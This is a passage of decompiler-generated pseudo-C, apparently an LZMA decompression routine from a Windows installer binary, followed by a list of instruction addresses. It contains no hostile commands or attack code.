											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x00406355
0x00406355
0x00406359
0x00406382
0x0040638c
0x0040635b
0x00406364
0x00406371
0x00406374
0x004066b8
0x004066b8
0x004066bb
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00406709
0x0040670d
0x004068bc
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x004068ee
0x00406719
0x00406720
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
